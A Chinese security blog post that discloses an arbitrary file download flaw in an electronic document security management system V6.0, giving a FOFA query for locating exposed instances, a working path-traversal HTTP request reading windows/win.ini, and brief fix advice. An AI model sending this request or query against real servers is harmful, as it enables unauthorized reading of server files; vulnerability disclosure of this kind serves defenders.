电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。

搜索语法

FOFA:body="docsafe/docsafe.nocache.js"

漏洞再现

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh;q=0.9

Connection: keep-alive

修复建议

禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本

相关推荐
何中应2 分钟前
EasyExcel使用(二:写出)
java·后端·maven·excel
awonw11 分钟前
[python][基础]Flask 技术栈
开发语言·python·flask
木宇(记得热爱生活)24 分钟前
Qt GUI缓存实现
开发语言·qt·缓存
lly20240628 分钟前
C# 正则表达式
开发语言
Chef_Chen31 分钟前
从0开始学习R语言--Day58--竞争风险模型
android·开发语言·kotlin
姜 萌@cnblogs36 分钟前
Saga Reader 0.9.9 版本亮点:深入解析核心新功能实现
前端·ai·rust
gnip44 分钟前
实现elementplus官网主题切换特效
前端·css
Darling02zjh1 小时前
HTML5
前端·html·html5
minji...1 小时前
数据结构 堆(4)---TOP-K问题
java·数据结构·算法
开开心心_Every1 小时前
多线程语音识别工具
javascript·人工智能·ocr·excel·语音识别·symfony